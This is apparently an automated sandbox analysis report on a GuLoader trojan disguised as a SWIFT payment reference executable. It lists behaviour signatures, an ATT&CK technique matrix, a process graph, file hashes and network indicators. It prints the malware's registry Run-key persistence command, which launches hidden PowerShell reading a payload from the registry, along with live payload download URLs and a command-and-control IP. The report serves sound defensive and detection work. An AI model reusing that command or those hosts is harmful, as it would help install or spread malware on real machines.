      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5411Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3628Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep time: -6456360425798339s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeCode function: 7_2_0040290B FindFirstFileW,7_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeCode function: 7_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405C13
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeCode function: 7_2_0040683D FindFirstFileW,FindClose,7_2_0040683D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
      Source: Vitis.exe, 00000007.00000002.2926772694.0000000002477000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Vitis.exe, 00000007.00000002.2926772694.0000000002477000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhK
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeAPI call chain: ExitProcess graph end nodegraph_0-3975
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeAPI call chain: ExitProcess graph end nodegraph_0-3979
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_069E7118 LdrInitializeThunk,1_2_069E7118
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Vitis.exe base: 1720000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Vitis.exe base: 19FFF4Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vitis.exe C:\Users\user\AppData\Local\Temp\Vitis.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bortopereringer" /t reg_expand_sz /d "%trimmere% -windowstyle minimized $storkenes=(get-itemproperty -path 'hkcu:\oxylabrax\').discumber;%trimmere% ($storkenes)
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bortopereringer" /t reg_expand_sz /d "%trimmere% -windowstyle minimized $storkenes=(get-itemproperty -path 'hkcu:\oxylabrax\').discumber;%trimmere% ($storkenes)Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping111
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts11
      Command and Scripting Interpreter
      1
      DLL Side-Loading
      111
      Process Injection
      1
      Modify Registry
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)1
      Registry Run Keys / Startup Folder
      31
      Virtualization/Sandbox Evasion
      Security Account Manager31
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive1
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading
      1
      Access Token Manipulation
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
      Process Injection
      LSA Secrets3
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Deobfuscate/Decode Files or Information
      Cached Domain Credentials14
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Obfuscated Files or Information
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1410987 Sample: New-Swift-Reference-BWT2810... Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 36 g-eurasia-ru.com 2->36 40 Antivirus detection for URL or domain 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected GuLoader 2->44 46 3 other signatures 2->46 10 New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe 17 33 2->10         started        signatures3 process4 file5 32 C:\Users\user\AppData\...\Profilen127.Aff, ASCII 10->32 dropped 52 Suspicious powershell command line found 10->52 14 powershell.exe 20 10->14         started        signatures6 process7 file8 34 C:\Users\user\AppData\Local\Temp\Vitis.exe, PE32 14->34 dropped 54 Obfuscated command line found 14->54 56 Writes to foreign memory regions 14->56 58 Powershell drops PE file 14->58 18 Vitis.exe 2 7 14->18         started        22 conhost.exe 14->22         started        24 cmd.exe 1 14->24         started        signatures9 process10 dnsIp11 38 g-eurasia-ru.com 192.121.162.150, 80 NFORCENL Sweden 18->38 48 Multi AV Scanner detection for dropped file 18->48 50 Machine Learning detection for dropped file 18->50 26 cmd.exe 1 18->26         started        signatures12 process13 process14 28 conhost.exe 26->28         started        30 reg.exe 1 1 26->30         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe58%ReversingLabsWin32.Trojan.GuLoader
      New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Vitis.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\Vitis.exe58%ReversingLabsWin32.Trojan.GuLoader
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
      https://contoso.com/0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      http://g-eurasia-ru.com/fan/ZfUdfOc32.binM0%Avira URL Cloudsafe
      http://g-eurasia-ru.com/fan/ZfUdfOc32.binu0%Avira URL Cloudsafe
      http://g-eurasia-ru.com/fan/ZfUdfOc32.bin0%Avira URL Cloudsafe
      http://g-eurasia-ru.com/fan/ZfUdfOc32.binA0%Avira URL Cloudsafe
      http://g-eurasia-ru.com/fan/ZfUdfOc32.binZ0%Avira URL Cloudsafe
      http://g-eurasia-ru.com/fan/ZfUdfOc32.binD0%Avira URL Cloudsafe
      http://g-eurasia-ru.com/fan/ZfUdfOc32.binh0%Avira URL Cloudsafe
      http://g-eurasia-ru.com/fan/ZfUdfOc32.binDomiPhaclg-logistic.com.ua/toys/ZfUdfOc32.binSlanOelmig-pal0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      g-eurasia-ru.com
      192.121.162.150
      truefalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://g-eurasia-ru.com/fan/ZfUdfOc32.binMVitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmptrue
          • URL Reputation: malware
          unknown
          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2592920909.00000000049E1000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://g-eurasia-ru.com/fan/ZfUdfOc32.binuVitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://g-eurasia-ru.com/fan/ZfUdfOc32.binZVitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://g-eurasia-ru.com/fan/ZfUdfOc32.binzVitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://g-eurasia-ru.com/fan/ZfUdfOc32.binDomiPhaclg-logistic.com.ua/toys/ZfUdfOc32.binSlanOelmig-palVitis.exe, 00000007.00000002.2938761024.000000001E350000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://g-eurasia-ru.com/fan/ZfUdfOc32.binVitis.exe, 00000007.00000002.2938761024.000000001E350000.00000004.00001000.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.0000000002477000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nsis.sf.net/NSIS_ErrorErrorNew-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, Vitis.exe.1.drfalse
                    high
                    http://g-eurasia-ru.com/fan/ZfUdfOc32.binAVitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://g-eurasia-ru.com/fan/ZfUdfOc32.binDVitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2592920909.00000000049E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://g-eurasia-ru.com/fan/ZfUdfOc32.binhVitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        192.121.162.150
                        g-eurasia-ru.comSweden
                        43350NFORCENLfalse
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1410987
                        Start date and time:2024-03-18 14:35:48 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 16s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:12
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                        Detection:MAL
                        Classification:mal100.troj.winEXE@13/11@1/1
                        EGA Information:
                        • Successful, ratio: 33.3%
                        HCA Information:
                        • Successful, ratio: 93%
                        • Number of executed functions: 103
                        • Number of non-executed functions: 77
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target Vitis.exe, PID 7512 because there are no executed function
                        • Execution Graph export aborted for target powershell.exe, PID 7108 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                        TimeTypeDescription
                        13:37:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bortopereringer %Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
                        13:37:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bortopereringer %Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
                        14:36:41API Interceptor41x Sleep call for process: powershell.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        192.121.162.150Swift_TT_CONFIRMATION_381073_3081HA_3847_309173XH_3087262C_DDIRK.exeGet hashmaliciousGuLoaderBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          g-eurasia-ru.comSwift_TT_CONFIRMATION_381073_3081HA_3847_309173XH_3087262C_DDIRK.exeGet hashmaliciousGuLoaderBrowse
                          • 192.121.162.150
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          NFORCENLSwift_TT_CONFIRMATION_381073_3081HA_3847_309173XH_3087262C_DDIRK.exeGet hashmaliciousGuLoaderBrowse
                          • 192.121.162.150
                          http://www.madrasaenajah.com/lob-yhIe~Mf/C/Get hashmaliciousPhisherBrowse
                          • 77.81.121.143
                          http://www.ppploan.net/zob-Bj5e~yf/C/Get hashmaliciousPhisherBrowse
                          • 77.81.121.143
                          SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                          • 185.66.143.178
                          http://www.madrasaenajah.com/lob-EPZb~Mf/C/Get hashmaliciousPhisherBrowse
                          • 77.81.121.143
                          https://hostagequ.win/100fee21b777b58e800/fdgGet hashmaliciousPhisherBrowse
                          • 77.81.121.143
                          http://www.jamaicanmoringa.net/enb-VXPc~yf/C/Get hashmaliciousPhisherBrowse
                          • 77.81.121.143
                          http://www.jamaicanmoringa.net/enb-VXPc~yf/C/Get hashmaliciousPhisherBrowse
                          • 77.81.121.143
                          http://www.gemstats.net/1mb-ss~yf/C/Get hashmaliciousPhisherBrowse
                          • 77.81.121.143
                          http://www.coslessociety.com/Emb-4m6~yf/C/Get hashmaliciousPhisherBrowse
                          • 77.81.121.143
                          No context
                          No context
                          Process:C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                          Category:dropped
                          Size (bytes):958
                          Entropy (8bit):3.546011626462722
                          Encrypted:false
                          SSDEEP:12:8wl0ha/ledp8wXuQUlbqpsOtUxmbdpYmHbqetUgoRKQ1fAYFaSHgzJCN85v4t2YE:89dO/9fcd9No9dvHC24qy
                          MD5:58D9261727208D46F702F8242733DDC6
                          SHA1:1360EAFCD10C2A453F427F299F6AD219ECAFACF9
                          SHA-256:9D862443CD679FC3367B89CFCBEC60BDDC86FCCE3C493ED90B88388FB6B00CC9
                          SHA-512:39F10B1FB5563B5D31CBC1C2144CE43D7E3E7A539017D6CD7042E3E3D453D0AE1F9162906AF336FDF3B4FEF4D55A71F2D37972F119EF5F5B0BD7CC46A50AC4CD
                          Malicious:false
                          Reputation:low
                          Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.......2...........Tankvognskrselsulykke.geo.d............................................T.a.n.k.v.o.g.n.s.k.r.s.e.l.s.u.l.y.k.k.e...g.e.o...(...C.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.T.a.n.k.v.o.g.n.s.k.r.s.e.l.s.u.l.y.k.k.e...g.e.o.A.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.e.d.l.e.m.s.k.a.r.t.o.t.e.k.\.v.e.j.m.a.t.e.r.i.a.l.e.r.n.e.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:modified
                          Size (bytes):8003
                          Entropy (8bit):4.838950934453595
                          Encrypted:false
                          SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                          MD5:4C24412D4F060F4632C0BD68CC9ECB54
                          SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                          SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                          SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                          Malicious:false
                          Reputation:moderate, very likely benign file
